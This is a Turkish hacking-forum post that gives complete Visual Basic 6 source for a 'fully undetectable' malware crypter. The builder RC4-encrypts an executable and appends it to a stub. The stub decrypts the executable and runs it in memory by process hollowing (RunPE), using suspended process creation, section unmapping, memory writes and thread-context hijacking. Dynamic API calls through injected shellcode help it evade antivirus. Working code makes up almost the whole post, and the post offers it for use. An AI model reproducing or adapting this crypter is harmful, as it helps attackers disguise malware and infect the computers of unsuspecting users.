Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Programlama
> Visual Basic

Visual Basic Öğrenilmesi ve kullanışı kolay olan Visual Basic’in dökümanlarının ve open source projelerin paylaşım alanı.Vb 6 %100 Fud crypter yapalım// Kara4747//

Visual Basic

Yeni Konu aç Cevapla
 
Seçenekler
Alt 28-05-2013 13:33   #1
  • Yüzbaşı
  • Üye Bilgileri
Üyelik tarihi
12/2012
Nereden
Seul-Korea
Mesajlar
Konular

Teşekkür (Etti): 91
Teşekkür (Aldı): 41


Cool Vb 6 %100 Fud crypter yapalım// Kara4747//Forume 3 adet command 2 adet commondialog 2 adet text Yerleştirelim

Command 1 ismi = btnBrowseOpen
Command 2 ismi = btnSave
Command 3 ismi = btnBuild
Commondialog 1 ismi = saveDiag
Commondialog 2 = ismi openDiag
Text1 ismi = txtfilepath
Text2 ismi = txtSavepath
Ve 1 adette module yerleştirelim Module adı = rc4mod

Form1 General kısmı :

Kod:
Option Explicit


Dim openPath As String, savePath As String


Const myEncPass = "thepassword"

Private Sub btnBrowseOpen_Click()

openDiag.DialogTitle = "Select a file to open"
openDiag.Filter = "Exe files | *.exe"
openDiag.ShowOpen
openPath = openDiag.FileName
txtfilepath.Text = openPath
End Sub

Private Sub btnSave_Click()

saveDiag.DialogTitle = "Save as..."
saveDiag.Filter = "Exe files | *.exe"
saveDiag.ShowSave
savePath = saveDiag.FileName
txtSavepath.Text = savePath
End Sub

Private Sub btnBuild_Click()
Dim infectedFile As String, newFile As String, stubfile As String


Open openPath For Binary As #1
infectedFile = Space(LOF(1))
Get #1, , infectedFile
Close #1


infectedFile = RC4(infectedFile, myEncPass)


Open App.Path & "\stub.exe" For Binary As #2
stubfile = Space(LOF(2))
Get #2, , stubfile
Close #2


newFile = stubfile & "XSEPERATORX" & infectedFile


Open savePath For Binary As #3
Put #3, , newFile
Close #3

MsgBox "Built!"
End SubModele kısmına girilcek kod :

Kod:


Public Function RC4(ByVal Expression As String, ByVal Password As String) As String
On Error Resume Next
Dim RB(0 To 255) As Integer, X As Long, Y As Long, Z As Long, Key() As Byte, ByteArray() As Byte, Temp As Byte
If Len(Password) = 0 Then
Exit Function
End If
If Len(Expression) = 0 Then
Exit Function
End If
If Len(Password) > 256 Then
Key() = StrConv(Left$(Password, 256), vbFromUnicode)
Else
Key() = StrConv(Password, vbFromUnicode)
End If
For X = 0 To 255
RB(X) = X
Next X
X = 0
Y = 0
Z = 0
For X = 0 To 255
Y = (Y + RB(X) + Key(X Mod Len(Password))) Mod 256
Temp = RB(X)
RB(X) = RB(Y)
RB(Y) = Temp
Next X
X = 0
Y = 0
Z = 0
ByteArray() = StrConv(Expression, vbFromUnicode)
For X = 0 To Len(Expression)
Y = (Y + 1) Mod 256
Z = (Z + RB(Y)) Mod 256
Temp = RB(Y)
RB(Y) = RB(Z)
RB(Z) = Temp
ByteArray(X) = ByteArray(X) Xor (RB((RB(Y) + RB(Z)) Mod 256))
Next X
RC4 = StrConv(ByteArray, vbUnicode)
End Function
Gelelim stub kodlarına Stubu ayrı bir vb6 formu açın ve

3 Tane modüle oluşturun
Module 1 ad = mainmod
Module 2 ad = rc4mod
Module 3 ad = runPE

Module 1 :

Kod:
Const myEncPass = "thepassword"
Sub Main()
Dim thisfile As String, infectedfile As String, selfpath As String


selfpath = App.Path & "\" & App.EXEName & ".exe"


Open selfpath For Binary As #1
thisfile = Space(LOF(1))
Get #1, , thisfile
Close #1

infectedfile = Split(thisfile, "XSEPERATORX")(1)
infectedfile = RC4(infectedfile, myEncPass)


Injec selfpath, StrConv(infectedfile, vbFromUnicode), vbNullString
End Sub

Module 2 :

Kod:
Public Function RC4(ByVal Expression As String, ByVal Password As String) As String
On Error Resume Next
Dim RB(0 To 255) As Integer, X As Long, Y As Long, Z As Long, Key() As Byte, ByteArray() As Byte, Temp As Byte
If Len(Password) = 0 Then
Exit Function
End If
If Len(Expression) = 0 Then
Exit Function
End If
If Len(Password) > 256 Then
Key() = StrConv(Left$(Password, 256), vbFromUnicode)
Else
Key() = StrConv(Password, vbFromUnicode)
End If
For X = 0 To 255
RB(X) = X
Next X
X = 0
Y = 0
Z = 0
For X = 0 To 255
Y = (Y + RB(X) + Key(X Mod Len(Password))) Mod 256
Temp = RB(X)
RB(X) = RB(Y)
RB(Y) = Temp
Next X
X = 0
Y = 0
Z = 0
ByteArray() = StrConv(Expression, vbFromUnicode)
For X = 0 To Len(Expression)
Y = (Y + 1) Mod 256
Z = (Z + RB(Y)) Mod 256
Temp = RB(Y)
RB(Y) = RB(Z)
RB(Z) = Temp
ByteArray(X) = ByteArray(X) Xor (RB((RB(Y) + RB(Z)) Mod 256))
Next X
RC4 = StrConv(ByteArray, vbUnicode)
End Function
Module 3 :

Kod:
Option Explicit

Private Const CONTEXT_FULL As Long = &H10007
Private Const MAX_PATH As Integer = 260
Private Const CREATE_SUSPENDED As Long = &H4
Private Const MEM_COMMIT As Long = &H1000
Private Const MEM_RESERVE As Long = &H2000
Private Const PAGE_EXECUTE_READWRITE As Long = &H40

Private Declare Function CreateProcessA Lib "kernel32" (ByVal lpAppName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, bvBuff As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function OutputDebugString Lib "kernel32" Alias "OutputDebugStringA" (ByVal lpOutputString As String) As Long

Public Declare Sub RtlMoveMemory Lib "kernel32" (Dest As Any, Src As Any, ByVal L As Long)
Private Declare Function CallWindowProcA Lib "user32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long
Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Private Declare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As Long

Private Type SECURITY_ATTRIBUTES
nLength As Long
lpSecurityDescriptor As Long
bInheritHandle As Long
End Type

Private Type STARTUPINFO
cb As Long
lpReserved As Long
lpDesktop As Long
lpTitle As Long
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type

Private Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessId As Long
dwThreadID As Long
End Type

Private Type FLOATING_SAVE_AREA
ControlWord As Long
StatusWord As Long
TagWord As Long
ErrorOffset As Long
ErrorSelector As Long
DataOffset As Long
DataSelector As Long
RegisterArea(1 To 80) As Byte
Cr0NpxState As Long
End Type

Private Type CONTEXT
ContextFlags As Long

Dr0 As Long
Dr1 As Long
Dr2 As Long
Dr3 As Long
Dr6 As Long
Dr7 As Long

FloatSave As FLOATING_SAVE_AREA
SegGs As Long
SegFs As Long
SegEs As Long
SegDs As Long
Edi As Long
Esi As Long
Ebx As Long
Edx As Long
Ecx As Long
Eax As Long
Ebp As Long
Eip As Long
SegCs As Long
EFlags As Long
Esp As Long
SegSs As Long
End Type

Private Type IMAGE_DOS_HEADER
e_magic As Integer
e_cblp As Integer
e_cp As Integer
e_crlc As Integer
e_cparhdr As Integer
e_minalloc As Integer
e_maxalloc As Integer
e_ss As Integer
e_sp As Integer
e_csum As Integer
e_ip As Integer
e_cs As Integer
e_lfarlc As Integer
e_ovno As Integer
e_res(0 To 3) As Integer
e_oemid As Integer
e_oeminfo As Integer
e_res2(0 To 9) As Integer
e_lfanew As Long
End Type

Private Type IMAGE_FILE_HEADER
Machine As Integer
NumberOfSections As Integer
TimeDateStamp As Long
PointerToSymbolTable As Long
NumberOfSymbols As Long
SizeOfOptionalHeader As Integer
characteristics As Integer
End Type

Private Type IMAGE_DATA_DIRECTORY
VirtualAddress As Long
Size As Long
End Type

Private Type IMAGE_OPTIONAL_HEADER
Magic As Integer
MajorLinkerVersion As Byte
MinorLinkerVersion As Byte
SizeOfCode As Long
SizeOfInitializedData As Long
SizeOfUnitializedData As Long
AddressOfEntryPoint As Long
BaseOfCode As Long
BaseOfData As Long
' NT additional fields.
ImageBase As Long
SectionAlignment As Long
FileAlignment As Long
MajorOperatingSystemVersion As Integer
MinorOperatingSystemVersion As Integer
MajorImageVersion As Integer
MinorImageVersion As Integer
MajorSubsystemVersion As Integer
MinorSubsystemVersion As Integer
W32VersionValue As Long
SizeOfImage As Long
SizeOfHeaders As Long
CheckSum As Long
SubSystem As Integer
DllCharacteristics As Integer
SizeOfStackReserve As Long
SizeOfStackCommit As Long
SizeOfHeapReserve As Long
SizeOfHeapCommit As Long
LoaderFlags As Long
NumberOfRvaAndSizes As Long
DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY
End Type

Private Type IMAGE_NT_HEADERS
Signature As Long
FileHeader As IMAGE_FILE_HEADER
OptionalHeader As IMAGE_OPTIONAL_HEADER
End Type

Private Type IMAGE_SECTION_HEADER
SecName As String * 8
VirtualSize As Long
VirtualAddress As Long
SizeOfRawData As Long
PointerToRawData As Long
PointerToRe********s As Long
PointerToLinenumbers As Long
NumberOfRe********s As Integer
NumberOfLinenumbers As Integer
characteristics As Long
End Type

Private Function CallAPI(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long
Dim lPtr As Long
Dim bvASM(&HEC00& - 1) As Byte
Dim i As Long
Dim lMod As Long

lMod = GetProcAddress(LoadLibraryA(sLib), sMod)
If lMod = 0 Then Exit Function

lPtr = VarPtr(bvASM(0))
RtlMoveMemory ByVal lPtr, &H59595958, &H4: lPtr = lPtr + 4
RtlMoveMemory ByVal lPtr, &H5059, &H2: lPtr = lPtr + 2
For i = UBound(Params) To 0 Step -1
RtlMoveMemory ByVal lPtr, &H68, &H1: lPtr = lPtr + 1
RtlMoveMemory ByVal lPtr, CLng(Params(i)), &H4: lPtr = lPtr + 4
Next
RtlMoveMemory ByVal lPtr, &HE8, &H1: lPtr = lPtr + 1
RtlMoveMemory ByVal lPtr, lMod - lPtr - 4, &H4: lPtr = lPtr + 4
RtlMoveMemory ByVal lPtr, &HC3, &H1: lPtr = lPtr + 1
CallAPI = CallWindowProcA(VarPtr(bvASM(0)), 0, 0, 0, 0)
End Function

Sub Injec(ByVal sHost As String, ByRef bvBuff() As Byte, parameter As String)
Dim i As Long
Dim Pidh As IMAGE_DOS_HEADER
Dim Pinh As IMAGE_NT_HEADERS
Dim Pish As IMAGE_SECTION_HEADER
Dim Si As STARTUPINFO
Dim Pi As PROCESS_INFORMATION
Dim Ctx As CONTEXT

Si.cb = Len(Si)

RtlMoveMemory Pidh, bvBuff(0), 64
RtlMoveMemory Pinh, bvBuff(Pidh.e_lfanew), 248

CreateProcessA sHost, " " & parameter, 0, 0, False, CREATE_SUSPENDED, 0, 0, Si, Pi
CallAPI "ntdll", "NtUnmapViewOfSection", Pi.hProcess, Pinh.OptionalHeader.ImageBase
CallAPI "kernel32", "VirtualAllocEx", Pi.hProcess, Pinh.OptionalHeader.ImageBase, Pinh.OptionalHeader.SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE
WriteProcessMemory Pi.hProcess, ByVal Pinh.OptionalHeader.ImageBase, bvBuff(0), Pinh.OptionalHeader.SizeOfHeaders, 0

For i = 0 To Pinh.FileHeader.NumberOfSections - 1
RtlMoveMemory Pish, bvBuff(Pidh.e_lfanew + 248 + 40 * i), Len(Pish)
WriteProcessMemory Pi.hProcess, ByVal Pinh.OptionalHeader.ImageBase + Pish.VirtualAddress, bvBuff(Pish.PointerToRawData), Pish.SizeOfRawData, 0
Next i

Ctx.ContextFlags = CONTEXT_FULL
CallAPI "kernel32", "GetThreadContext", Pi.hThread, VarPtr(Ctx)
WriteProcessMemory Pi.hProcess, ByVal Ctx.Ebx + 8, Pinh.OptionalHeader.ImageBase, 4, 0
Ctx.Eax = Pinh.OptionalHeader.ImageBase + Pinh.OptionalHeader.AddressOfEntryPoint
CallAPI "kernel32", "SetThreadContext", Pi.hThread, VarPtr(Ctx)
CallAPI "kernel32", "ResumeThread", Pi.hThread
End Sub

Public Function StrToBytArray(ByVal sStr As String) As Byte()
Dim i As Long
Dim Buffer() As Byte
ReDim Buffer(Len(sStr) - 1)
For i = 1 To Len(sStr)
Buffer(i - 1) = Asc(Mid(sStr, i, 1))
Next i
StrToBytArray = Buffer
End Function

Public Function ThisExe() As String
Dim lRet As Long
Dim bvBuff(255) As Byte
lRet = CallAPI("kernel32", "GetModuleFileNameA", App.hInstance, VarPtr(bvBuff(0)), 256)
ThisExe = Left$(StrConv(bvBuff, vbUnicode), lRet)
End FunctionHazır stubu exe die çıkarabilirisinz crypterinizide öyle iyi kulllanımlar
""Alıntıdır"" Ama Bir teşekkür lütfen.
 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Siber Güvenlik
Pomeranian Boo
instagram takipci hilesi

wau